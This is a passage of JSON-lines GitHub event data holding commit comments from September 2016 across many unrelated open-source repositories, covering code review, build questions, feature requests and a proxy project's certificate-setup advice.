{"id":"4546364367","type":"CommitCommentEvent","actor":{"login":"mauser"},"repo":{"name":"hydrogen-music/hydrogen"},"payload":{"comment":{"id":18977825,"position":null,"line":null,"path":null,"commit_id":"6259a9e9d95f570366c1c27da101fa8697e878f1","created_at":"2016-09-11T19:26:19Z","updated_at":"2016-09-11T19:26:19Z","body":"Hi! \r\n\r\nJust to be sure: Have you tried a clean build and/or deleting all the cmake cache files? "}},"created_at":"2016-09-11T19:26:19Z"}
{"id":"4546366209","type":"CommitCommentEvent","actor":{"login":"socalspawn"},"repo":{"name":"CalcProgrammer1/KeyboardVisualizerVCUI_Release"},"payload":{"comment":{"id":18977831,"position":null,"line":null,"path":null,"commit_id":"6d926d0ad317db20ebe38ed73d8c53e410bd0aed","created_at":"2016-09-11T19:27:32Z","updated_at":"2016-09-11T19:27:32Z","body":"Hey Calc I just wanted to say thank you for making and updating KV! I'm currently running 1.16 with Synap 2.20 no problems. In case you didn't know there's a new [Razer Ornata Chroma](http://www.razerzone.com/gaming-keyboards-keypads/razer-ornata-chroma) out. I'm thinking of getting it as my girlfriend dumped  craft beer across my Blackwidow while pointing at my screen. I yanked the keyboard and immediately flipped it over on towel to drain. I let it dry, removed 10 keys that were now glued in place, . I used electrical contact cleaner on they key posts and amazingly my keyboard was back in business. (My girlfriend was as well.. lol) Your app was the perfect touch I was needing for my slightly modified rig while jammin tunes! (The space in the case is for watercooling but its so clean I may not bother.. lol.) Do you think the app could support the [NZXT Hue?](https://www.nzxt.com/products/hue) or maybe the [Hue+?](https://www.nzxt.com/products/hue-plus) I may customize the LED's in my Nvidia cards.. but they tie into the GeForce experience software.. its only a bit of green plastic keeping me from the led behind them. I know green is Nvidia's thing but I wish they would have made the lighting selectable. I run this on the command line while at lans.. people trip. =D (amplitude=150 bkgd_bright=100 avg_size=25 decay=30 delay=150 nrml_ofst=0 nrml_scl=5 bkgd_mode=11 frgd_mode=4 single_color_mode=9 startminimized)\r\n\r\nAnyway thanks again man! ~Socal\r\n\r\n![socalspawn 1](https://cloud.githubusercontent.com/assets/22135183/18419728/4785e932-7816-11e6-81b7-89c5f9d817e9.JPG)\r\n"}},"created_at":"2016-09-11T19:27:32Z"}
{"id":"4546368730","type":"CommitCommentEvent","actor":{"login":"CalcProgrammer1"},"repo":{"name":"CalcProgrammer1/KeyboardVisualizerVCUI_Release"},"payload":{"comment":{"id":18977833,"position":null,"line":null,"path":null,"commit_id":"6d926d0ad317db20ebe38ed73d8c53e410bd0aed","created_at":"2016-09-11T19:29:06Z","updated_at":"2016-09-11T19:29:06Z","body":"Razer already contacted me about the Ornata.  I plan to update sometime this week to support it."}},"created_at":"2016-09-11T19:29:06Z"}
{"id":"4546368957","type":"CommitCommentEvent","actor":{"login":"knorker"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":18977834,"position":null,"line":null,"path":null,"commit_id":"414b989850cfbdf7ec0442c1b6fd35d3f95cd732","created_at":"2016-09-11T19:29:14Z","updated_at":"2016-09-11T19:29:14Z","body":"i thought it was a reference to https://github.com/ZeroK-RTS/Zero-K-Infrastructure/issues/259#issuecomment-242447959"}},"created_at":"2016-09-11T19:29:14Z"}
{"id":"4546369719","type":"CommitCommentEvent","actor":{"login":"socalspawn"},"repo":{"name":"CalcProgrammer1/KeyboardVisualizerVCUI_Release"},"payload":{"comment":{"id":18977835,"position":null,"line":null,"path":null,"commit_id":"6d926d0ad317db20ebe38ed73d8c53e410bd0aed","created_at":"2016-09-11T19:29:42Z","updated_at":"2016-09-11T19:29:42Z","body":"You rock! Thank you again!"}},"created_at":"2016-09-11T19:29:42Z"}
{"id":"4546370683","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/pacman-mirrors"},"payload":{"comment":{"id":18977836,"position":null,"line":null,"path":null,"commit_id":"d3de378e5d08f049aa97ce0fe6e89ef51d1d9bbb","created_at":"2016-09-11T19:30:19Z","updated_at":"2016-09-11T19:30:19Z","body":"Nice.\r\nYou signed up at travis-ci?"}},"created_at":"2016-09-11T19:30:19Z"}
{"id":"4546371731","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977838,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T19:30:55Z","updated_at":"2016-09-11T19:30:55Z","body":"If `length(x)=ncol*nrow`, then we are fine. But `x` can be much short vector. for example,\r\n```\r\nmatrix(1:5, 5, 5)\r\n```\r\nTranspose need to copy the matrix, which can be slow if the matrix is huge.\r\nNot sure if Julia optimized transpose or not. \r\nCould you compare the speed of reshape and transpose a huge matrix? "}},"created_at":"2016-09-11T19:30:55Z"}
{"id":"4546372644","type":"CommitCommentEvent","actor":{"login":"rdvincent"},"repo":{"name":"BIC-MNI/libminc"},"payload":{"comment":{"id":18977840,"position":null,"line":null,"path":null,"commit_id":"464f006e1d184eb311671e16bd71442211315283","created_at":"2016-09-11T19:31:27Z","updated_at":"2016-09-11T19:31:27Z","body":"@gdevenyi Sure!"}},"created_at":"2016-09-11T19:31:27Z"}
{"id":"4546373073","type":"CommitCommentEvent","actor":{"login":"DNorell"},"repo":{"name":"IOOPM-UU/achievements"},"payload":{"comment":{"id":18977841,"position":null,"line":null,"path":null,"commit_id":"97e9ea230fbfdb0a88f4bfec2be78ef05c0d7b79","created_at":"2016-09-11T19:31:44Z","updated_at":"2016-09-11T19:31:44Z","body":"Läser man de så blir det rimligt. Det är lite otydligt att det är det som menas, men det kanske bara är jag som tycker det."}},"created_at":"2016-09-11T19:31:44Z"}
{"id":"4546373261","type":"CommitCommentEvent","actor":{"login":"dequis"},"repo":{"name":"dequis/test"},"payload":{"comment":{"id":18977842,"position":null,"line":null,"path":null,"commit_id":"607734fb7a1b378112877188864fbd730fae2b53","created_at":"2016-09-11T19:31:54Z","updated_at":"2016-09-11T19:31:54Z","body":"testsetsetset"}},"created_at":"2016-09-11T19:31:54Z"}
{"id":"4546373930","type":"CommitCommentEvent","actor":{"login":"knorker"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":18977843,"position":null,"line":null,"path":null,"commit_id":"8d0f810ab889a551487ab361d5512548515e25a1","created_at":"2016-09-11T19:32:18Z","updated_at":"2016-09-11T19:32:18Z","body":"with the various random lobby problems it will take about 10 minutes for all users to be banned"}},"created_at":"2016-09-11T19:32:18Z"}
{"id":"4546374984","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977844,"position":null,"line":null,"path":null,"commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T19:32:54Z","updated_at":"2016-09-11T19:32:54Z","body":"yep, it seems to perform better in all cases (low number of connections, many frames & the opposite)"}},"created_at":"2016-09-11T19:32:54Z"}
{"id":"4546377886","type":"CommitCommentEvent","actor":{"login":"sf-x"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18977849,"position":null,"line":null,"path":null,"commit_id":"1fe081c02f30b2cddfdd3b73709b8cafa67ac6b8","created_at":"2016-09-11T19:34:49Z","updated_at":"2016-09-11T19:34:49Z","body":"http://tests.stockfishchess.org/tests/view/543ab7420ebc59106cb96d81"}},"created_at":"2016-09-11T19:34:49Z"}
{"id":"4546378933","type":"CommitCommentEvent","actor":{"login":"dequis"},"repo":{"name":"dequis/test"},"payload":{"comment":{"id":18977850,"position":null,"line":null,"path":null,"commit_id":"607734fb7a1b378112877188864fbd730fae2b53","created_at":"2016-09-11T19:35:29Z","updated_at":"2016-09-11T19:35:29Z","body":"testsetset"}},"created_at":"2016-09-11T19:35:29Z"}
{"id":"4546380439","type":"CommitCommentEvent","actor":{"login":"kumbayo"},"repo":{"name":"kumbayo/intellij-rust"},"payload":{"comment":{"id":18977853,"position":108,"line":232,"path":"src/test/kotlin/org/rust/lang/core/type/RustExpressionTypeInferenceTest.kt","commit_id":"01076bfea7b88fb0f3e3c153e5b074c6157dde5a","created_at":"2016-09-11T19:36:33Z","updated_at":"2016-09-11T19:36:33Z","body":"There is currently no test for strings.\r\nIn rust string literals are \"&'static str\" but in in intellij-rust we currently detect the type \"str\"\r\nI did not find a way to create a test with known failures.\r\nShould i add the commented out test instead?\r\n\r\n    fun testStr() = testExpr(\"\"\"\r\n        fn main() {\r\n            let a = \"Hello\";\r\n                   //^ &str\r\n        }\r\n    \"\"\")"}},"created_at":"2016-09-11T19:36:33Z"}
{"id":"4546380861","type":"CommitCommentEvent","actor":{"login":"dequis"},"repo":{"name":"dequis/test"},"payload":{"comment":{"id":18977855,"position":null,"line":null,"path":null,"commit_id":"607734fb7a1b378112877188864fbd730fae2b53","created_at":"2016-09-11T19:36:51Z","updated_at":"2016-09-11T19:36:51Z","body":"5w35w35w35w35w35"}},"created_at":"2016-09-11T19:36:51Z"}
{"id":"4546381524","type":"CommitCommentEvent","actor":{"login":"jpanikulam"},"repo":{"name":"uf-mil/rawgps-tools"},"payload":{"comment":{"id":18977856,"position":4,"line":4,"path":"rift_dk2_imu_driver/src/rift_dk2_imu_driver_nodelet.cpp","commit_id":"39fc8aad6b0152a0b1916e927fe134a42d29a495","created_at":"2016-09-11T19:37:18Z","updated_at":"2016-09-11T19:37:18Z","body":"lol"}},"created_at":"2016-09-11T19:37:18Z"}
{"id":"4546381604","type":"CommitCommentEvent","actor":{"login":"Dico200"},"repo":{"name":"RedstonerServer/redstoner-utils"},"payload":{"comment":{"id":18977857,"position":null,"line":null,"path":null,"commit_id":"347f6969bf411b160b2fc734a2c52bd4dea6a5be","created_at":"2016-09-11T19:37:21Z","updated_at":"2016-09-11T19:37:21Z","body":"I guess that works. Efficiency doesn't matter here anyway."}},"created_at":"2016-09-11T19:37:21Z"}
{"id":"4546382108","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":18977858,"position":null,"line":null,"path":null,"commit_id":"f03972516ad4c3584cf143577cd3685abdaa8fc0","created_at":"2016-09-11T19:37:40Z","updated_at":"2016-09-11T19:37:40Z","body":"AdminController 41-43\r\n+ ModelAndView modelAndView = new ModelAndView();\r\n+ modelAndView.setViewName(\"allUsers\");\r\nПри создании модел энд вью можно в параметро конструктора указать имя \r\n\r\nHelloWorldController\r\nан-но с прошлым пунктом, и в остальных местах тоже исправь\r\n\r\n\r\npublic ModelAndView answerTheQuestion(@RequestParam(\"answerId\") Long answerId,\r\n+ @RequestParam(\"taskId\") Long taskId,\r\n+ @RequestParam(\"points\") int points){\r\n\r\nну понял что это за метод и откуда он получает эти входящие параметры?\r\n\r\npublic ModelAndView editUserProfilePost\r\nТоже исправь на нормальную модель \r\n\r\npublic Set<Answer> getAnswersByTask\r\nА у таска нет маппинга того, какие юзеры его делали те мани то мани мб лучше сделать?\r\n\r\nRoleDaoImpl - public boolean updateRole(Role role)\r\nможно упросить конструкцию, подумай\r\n\r\nUserDaoImpl - getUserSet почему сначала достаёшь лист потом делаешь в сет? для чего 2 эти операции? Те почему нельзя оставить листом?\r\n\r\nUserDaoImpl - updateUser\r\nчем отличаются 2 эти записи?\r\n  e.printStackTrace();\r\n+ System.out.println(e.getMessage());\r\n\r\nAnswer + @GeneratedValue(strategy = GenerationType.AUTO)\r\nЕсли стоит аннотация @Id разве нужно ставить стратегию?\r\nВроде бы по дефолту автоинкремент\r\n\r\nЗачем ты везде отдельно в entity проставляешь type?\r\n\r\nУ каждой ентити обязательно должен быть переопределён toString()\r\n\r\nAuthenticationService зря я повёлся на поводу полного имени юзера, оставляй коротким ) ты просто был неопытным поэтому и не понял или оставь только у одного, а то слишком длинно. \r\n\r\n"}},"created_at":"2016-09-11T19:37:40Z"}
{"id":"4546382838","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":18977860,"position":null,"line":null,"path":null,"commit_id":"c379ce929192d5af0cfd6cddc4b3eedce8ef9033","created_at":"2016-09-11T19:38:09Z","updated_at":"2016-09-11T19:38:09Z","body":"+"}},"created_at":"2016-09-11T19:38:09Z"}
{"id":"4546383554","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"MikeMcQuaid/mikemcquaid.github.io"},"payload":{"comment":{"id":18977861,"position":null,"line":null,"path":null,"commit_id":"1d02f2259f2ba1fa955a53bae01c8ad907646ba5","created_at":"2016-09-11T19:38:36Z","updated_at":"2016-09-11T19:38:36Z","body":"@benbalter @parkr Any thoughts on how to do this better? I tried setting `layout: null` but that seemed to get overridden by the `defaults:` in `_config.yml`. Another annoying side-effect of this approach is:\r\n\r\n```\r\ncurl http://mikemcquaid.com/2015/10/06/runnable-documentation-code-for-humans/ | head -n1\r\n<p>&lt;!DOCTYPE html&gt;</p>\r\n```\r\n\r\nwhich is kinda ugly. Wasn't sure if this was a bug/misconfiguration/me failing at documentation."}},"created_at":"2016-09-11T19:38:36Z"}
{"id":"4546383641","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":18977862,"position":22,"line":22,"path":"python/coins_change_policy.py","commit_id":"7e565b4cecd35b448505286f6a187eb8e616c631","created_at":"2016-09-11T19:38:38Z","updated_at":"2016-09-11T19:38:38Z","body":"You can refer to \r\nhttps://github.com/Omega094/leetcode/blob/master/coin_change/CoinChange.py"}},"created_at":"2016-09-11T19:38:38Z"}
{"id":"4546383676","type":"CommitCommentEvent","actor":{"login":"yarikoptic"},"repo":{"name":"gitpython-developers/GitPython"},"payload":{"comment":{"id":18977863,"position":22,"line":113,"path":"git/test/test_repo.py","commit_id":"2ba897b12024fd20681b7c2f1b40bdbbccd5df59","created_at":"2016-09-11T19:38:40Z","updated_at":"2016-09-11T19:38:40Z","body":"You removed `def test_commits(` line, so now the body of that test became a part of the previous test. That is why my question about \"merging\". Just look at the diff"}},"created_at":"2016-09-11T19:38:40Z"}
{"id":"4546383840","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":18977864,"position":null,"line":null,"path":null,"commit_id":"6376381be39aa0810463e7801b425e9fdeb433ed","created_at":"2016-09-11T19:38:46Z","updated_at":"2016-09-11T19:38:46Z","body":"+"}},"created_at":"2016-09-11T19:38:46Z"}
{"id":"4546384852","type":"CommitCommentEvent","actor":{"login":"brian-singer"},"repo":{"name":"SebastianM/angular2-google-maps"},"payload":{"comment":{"id":18977865,"position":null,"line":null,"path":null,"commit_id":"19951f30c54645643f9bed3501a61bea9f5c9606","created_at":"2016-09-11T19:39:24Z","updated_at":"2016-09-11T19:39:24Z","body":"I should be around to help with the next release! At least in 1 week I will test this release"}},"created_at":"2016-09-11T19:39:24Z"}
{"id":"4546384929","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":18977866,"position":52,"line":52,"path":"python/coins_change_policy.py","commit_id":"7e565b4cecd35b448505286f6a187eb8e616c631","created_at":"2016-09-11T19:39:27Z","updated_at":"2016-09-11T19:39:27Z","body":"please refer to my version\r\nhttps://github.com/Omega094/leetcode/blob/master/combinations/Combinations.py"}},"created_at":"2016-09-11T19:39:27Z"}
{"id":"4546385862","type":"CommitCommentEvent","actor":{"login":"sf-x"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18977867,"position":null,"line":null,"path":null,"commit_id":"1fe081c02f30b2cddfdd3b73709b8cafa67ac6b8","created_at":"2016-09-11T19:40:02Z","updated_at":"2016-09-11T19:40:02Z","body":"A better method would be to measure slowdown, probably."}},"created_at":"2016-09-11T19:40:02Z"}
{"id":"4546389328","type":"CommitCommentEvent","actor":{"login":"felipexp8"},"repo":{"name":"felipexp8/teste"},"payload":{"comment":{"id":18977870,"position":3,"line":3,"path":"coisa","commit_id":"422bfb48d652ffe8e09e424db4594ccc3e2cd2fd","created_at":"2016-09-11T19:42:11Z","updated_at":"2016-09-11T19:42:11Z","body":"nada aqui, ou não?"}},"created_at":"2016-09-11T19:42:11Z"}
{"id":"4546391510","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977872,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T19:43:34Z","updated_at":"2016-09-11T19:43:34Z","body":"Well, if `ind` is 1 and `nx` is 5, we have `ix` equal to 0, bound error.\r\nI didn't consider the situation where `x` is a short vector, but it is a good point.\r\nI tested on vector of length 100000 and the reshape works better."}},"created_at":"2016-09-11T19:43:34Z"}
{"id":"4546392912","type":"CommitCommentEvent","actor":{"login":"adriatic"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":18977874,"position":null,"line":null,"path":null,"commit_id":"a985e1ba72a1b0c338ee0fb595c475a8b8b53b74","created_at":"2016-09-11T19:44:33Z","updated_at":"2016-09-11T19:44:33Z","body":"This is a very significant feature!"}},"created_at":"2016-09-11T19:44:33Z"}
{"id":"4546393772","type":"CommitCommentEvent","actor":{"login":"holm"},"repo":{"name":"peakon/saml2"},"payload":{"comment":{"id":18977876,"position":null,"line":null,"path":null,"commit_id":"ed2cb0654781616f008dbc9cc9b6e465494ac4c6","created_at":"2016-09-11T19:45:10Z","updated_at":"2016-09-11T19:45:10Z","body":"It is much easier if you just change the name of the package and publish it to our npm under @peakon. Then you don't have to do any of these changes."}},"created_at":"2016-09-11T19:45:10Z"}
{"id":"4546394627","type":"CommitCommentEvent","actor":{"login":"JorgenPo"},"repo":{"name":"AnZuev/IStudentStatic"},"payload":{"comment":{"id":18977877,"position":null,"line":null,"path":null,"commit_id":"9f1cf4705290044f4a0cf9c9df7497f4931bc2f4","created_at":"2016-09-11T19:45:44Z","updated_at":"2016-09-11T19:45:44Z","body":"*header"}},"created_at":"2016-09-11T19:45:44Z"}
{"id":"4546394952","type":"CommitCommentEvent","actor":{"login":"holm"},"repo":{"name":"peakon/saml2"},"payload":{"comment":{"id":18977878,"position":null,"line":null,"path":null,"commit_id":"ed2cb0654781616f008dbc9cc9b6e465494ac4c6","created_at":"2016-09-11T19:45:57Z","updated_at":"2016-09-11T19:45:57Z","body":"Alternatively you can just checkin the built files on a \"build\" branch"}},"created_at":"2016-09-11T19:45:57Z"}
{"id":"4546395069","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18977879,"position":33,"line":77,"path":"src/pocketmine/block/Anvil.php","commit_id":"8678d18013dcfec201477fcfaec707d2647b7a9c","created_at":"2016-09-11T19:46:02Z","updated_at":"2016-09-11T19:46:02Z","body":"Genisyjudris"}},"created_at":"2016-09-11T19:46:02Z"}
{"id":"4546395991","type":"CommitCommentEvent","actor":{"login":"cowhi"},"repo":{"name":"cowhi/deepatari"},"payload":{"comment":{"id":18977885,"position":null,"line":null,"path":null,"commit_id":"fc07963802f2065714bcc2874d944ac45ace5ade","created_at":"2016-09-11T19:46:33Z","updated_at":"2016-09-11T19:46:33Z","body":"@xoorath Sorry man, I just remember I had some problems with the Mock modules. Don't remember, why I took the imgmath line out. But I do remember that it took me a while until I got it working... Good luck!"}},"created_at":"2016-09-11T19:46:33Z"}
{"id":"4546396386","type":"CommitCommentEvent","actor":{"login":"farhanarnob"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":18977886,"position":null,"line":null,"path":null,"commit_id":"8c9cbfe5c53b2ede38ccb73d81ecbed2bd30fb46","created_at":"2016-09-11T19:46:47Z","updated_at":"2016-09-11T19:46:47Z","body":"visual polish not working at all."}},"created_at":"2016-09-11T19:46:47Z"}
{"id":"4546396831","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":18977887,"position":null,"line":null,"path":null,"commit_id":"9111004adbcf7e42f03e815750cdcb2ac7bddf97","created_at":"2016-09-11T19:47:04Z","updated_at":"2016-09-11T19:47:04Z","body":"i followed wiki =["}},"created_at":"2016-09-11T19:47:04Z"}
{"id":"4546397816","type":"CommitCommentEvent","actor":{"login":"src22"},"repo":{"name":"src22/ruby-fowler"},"payload":{"comment":{"id":18977888,"position":1,"line":3,"path":"instance_eval_builder.rb","commit_id":"7db905d6ebfc4bf86cf503d16755c8be4f126186","created_at":"2016-09-11T19:47:43Z","updated_at":"2016-09-11T19:47:43Z","body":"demo comment"}},"created_at":"2016-09-11T19:47:43Z"}
{"id":"4546398046","type":"CommitCommentEvent","actor":{"login":"socalspawn"},"repo":{"name":"CalcProgrammer1/KeyboardVisualizerVCUI_Release"},"payload":{"comment":{"id":18977889,"position":null,"line":null,"path":null,"commit_id":"6d926d0ad317db20ebe38ed73d8c53e410bd0aed","created_at":"2016-09-11T19:47:51Z","updated_at":"2016-09-11T19:47:51Z","body":"Hey question Calc.. would you know how you remove old versions of KV from Synap? I turn previous versions off and can hide them.. but I can't seem to locate how to remove them?\r\n![synap](https://cloud.githubusercontent.com/assets/22135183/18420023/9b4d9018-781d-11e6-8f06-31f5caa4ad2a.PNG)\r\n"}},"created_at":"2016-09-11T19:47:51Z"}
{"id":"4546401279","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18977897,"position":null,"line":null,"path":null,"commit_id":"743c97a508628c1444d8da55c82f15f5ef2fdf28","created_at":"2016-09-11T19:49:55Z","updated_at":"2016-09-11T19:49:55Z","body":"@jmontoyaa el método en ScriptHandler.php está en composer.json, pero no parece que esté llamado por el proceso de actualización de 1.9 a 1.10... Es un método estático, así que de llamarse, se puede llamar, pero también hay una serie de comandos de borrado en update-files-1.9-1.10 y update-files-1.10-1.11.\r\nQue sugieres? Todo duplicado? Todo en el ScriptHandler y llamarlo desde composer y desde el script de upgrade?"}},"created_at":"2016-09-11T19:49:55Z"}
{"id":"4546404123","type":"CommitCommentEvent","actor":{"login":"sebreh"},"repo":{"name":"peakon/saml2"},"payload":{"comment":{"id":18977900,"position":null,"line":null,"path":null,"commit_id":"ed2cb0654781616f008dbc9cc9b6e465494ac4c6","created_at":"2016-09-11T19:51:48Z","updated_at":"2016-09-11T19:51:48Z","body":"True, I could just check in the build files. I want to push my changes back to the original repo once add a test case for my fix, so didn't really want to republish the package."}},"created_at":"2016-09-11T19:51:48Z"}
{"id":"4546405071","type":"CommitCommentEvent","actor":{"login":"jbaxleyiii"},"repo":{"name":"boo1ean/casual"},"payload":{"comment":{"id":18977901,"position":null,"line":null,"path":null,"commit_id":"cf583fa4e9d1234be266e3b406e105c82dbc8a2a","created_at":"2016-09-11T19:52:27Z","updated_at":"2016-09-11T19:52:27Z","body":"@robertohuertasm this is awesome!"}},"created_at":"2016-09-11T19:52:27Z"}
{"id":"4546405385","type":"CommitCommentEvent","actor":{"login":"vshl"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18977902,"position":29,"line":29,"path":"api/src/main/resources/org/openmrs/api/db/hibernate/CohortMember.hbm.xml","commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-11T19:52:41Z","updated_at":"2016-09-11T19:52:41Z","body":"@wluyima I'm not sure. Should I add creator field alone? Does it need the other columns date_created, changed_by ...?"}},"created_at":"2016-09-11T19:52:41Z"}
{"id":"4546406655","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977905,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T19:53:27Z","updated_at":"2016-09-11T19:53:27Z","body":"Nicee. I'll likely make callback a template then."}},"created_at":"2016-09-11T19:53:27Z"}
{"id":"4546407015","type":"CommitCommentEvent","actor":{"login":"yamorad"},"repo":{"name":"carlosbalamba/MIKEBOL"},"payload":{"comment":{"id":18977906,"position":null,"line":null,"path":null,"commit_id":"b609a9ac9fe48605bd793ce75b5467562901beea","created_at":"2016-09-11T19:53:40Z","updated_at":"2016-09-11T19:53:40Z","body":"\r\n![relacional](https://cloud.githubusercontent.com/assets/20422315/18420055/62194e6a-782f-11e6-880f-9eff214be3b4.png)\r\n[mydb Diccionario.pdf](https://github.com/carlosbalamba/MIKEBOL/files/466198/mydb.Diccionario.pdf)\r\n\r\n"}},"created_at":"2016-09-11T19:53:40Z"}
{"id":"4546407178","type":"CommitCommentEvent","actor":{"login":"bmatcuk"},"repo":{"name":"bmatcuk/doublestar"},"payload":{"comment":{"id":18977907,"position":null,"line":null,"path":null,"commit_id":"0dc18b220d56c7fa133e614d6a089df0ed9a9ae2","created_at":"2016-09-11T19:53:47Z","updated_at":"2016-09-11T19:53:47Z","body":"Fixes #9."}},"created_at":"2016-09-11T19:53:47Z"}
{"id":"4546407626","type":"CommitCommentEvent","actor":{"login":"infotexture"},"repo":{"name":"dita-ot/dita-ot"},"payload":{"comment":{"id":18977909,"position":null,"line":null,"path":null,"commit_id":"ba16d0d73dec137aad9d7dda0c51ed015718a7a6","created_at":"2016-09-11T19:54:05Z","updated_at":"2016-09-11T19:54:05Z","body":"This commit handles the `license.txt` references, but leaves references to `LICENSE.md`unchanged.\r\n\r\nSearching with `git grep` from the HEAD of `develop` suggests 197 files still use that filename in the boilerplate comments.\r\n\r\n```sh\r\n$ git grep 'LICENSE.md' | wc -l\r\n     197\r\n```"}},"created_at":"2016-09-11T19:54:05Z"}
{"id":"4546410283","type":"CommitCommentEvent","actor":{"login":"rick020"},"repo":{"name":"rick020/App-Studio"},"payload":{"comment":{"id":18977913,"position":null,"line":null,"path":null,"commit_id":"5ff8d1830a00ea2a21b70dfcef8855221390a3ec","created_at":"2016-09-11T19:55:46Z","updated_at":"2016-09-11T19:55:46Z","body":"Screenshot App Mr. Potatohead"}},"created_at":"2016-09-11T19:55:46Z"}
{"id":"4546410332","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18977914,"position":33,"line":77,"path":"src/pocketmine/block/Anvil.php","commit_id":"8678d18013dcfec201477fcfaec707d2647b7a9c","created_at":"2016-09-11T19:55:48Z","updated_at":"2016-09-11T19:55:48Z","body":"yea"}},"created_at":"2016-09-11T19:55:48Z"}
{"id":"4546410519","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18977916,"position":33,"line":77,"path":"src/pocketmine/block/Anvil.php","commit_id":"8678d18013dcfec201477fcfaec707d2647b7a9c","created_at":"2016-09-11T19:55:57Z","updated_at":"2016-09-11T19:55:57Z","body":"dktapps readded it\r\n"}},"created_at":"2016-09-11T19:55:57Z"}
{"id":"4546411039","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":18977918,"position":null,"line":null,"path":null,"commit_id":"f03972516ad4c3584cf143577cd3685abdaa8fc0","created_at":"2016-09-11T19:56:16Z","updated_at":"2016-09-11T19:56:16Z","body":"тест коммент"}},"created_at":"2016-09-11T19:56:16Z"}
{"id":"4546413248","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977920,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T19:57:49Z","updated_at":"2016-09-11T19:57:49Z","body":"I should use `mod1`, not `div`. Corrected above.\r\n`reshape` is fast because it does not copy the matrix or vector, only changing number of rows. \r\nBut transpose can be very slow since it need to create a new matrix of transposed size. Try\r\n```\r\n x = rand(10000, 20000);\r\n@time x';\r\n```\r\n"}},"created_at":"2016-09-11T19:57:49Z"}
{"id":"4546414325","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18977925,"position":null,"line":null,"path":null,"commit_id":"1fe081c02f30b2cddfdd3b73709b8cafa67ac6b8","created_at":"2016-09-11T19:58:31Z","updated_at":"2016-09-11T19:58:31Z","body":"Bench is not the same"}},"created_at":"2016-09-11T19:58:31Z"}
{"id":"4545064967","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18975681,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-11T02:00:15Z","updated_at":"2016-09-11T02:00:15Z","body":"the cert file must be added into trusted root certification authorities\nstore. This is a example\nhttps://blogs.technet.microsoft.com/sbs/2008/05/08/installing-a-self-signed-certificate-as-a-trusted-root-ca-in-windows-vista/\n\n2016年9月11日 上午9:25，\"yuan78\" <notifications@github.com>写道：\n\n> Have imported fakecert, but the browser Chrome still report https error of\n> \"your link is not a private link\"\n>\n> 2016-09-10 23:40 GMT+08:00 yinqiwen <notifications@github.com>:\n>\n> > Add your ip into hosts.json. For gae, u should configure your ip for '*.\n> > appspot.com' .\n> >\n> > For fakecert issue, u must import the 'Fake-ACRoot-Certificate.cer' into\n> > your os's root CA to avoid the warnings of browsers, u can follow 12306's\n> > guide to import a root CA file. (12306 force u to import it's root CA\n> file\n> > if u want to use it's service.)\n> >\n> > u can generate the facecert files by openssl's command line tools, but\n> > it's complicated and i'm not remember how to do it now, can not give any\n> > advice.\n> >\n> > —\n> > You are receiving this because you 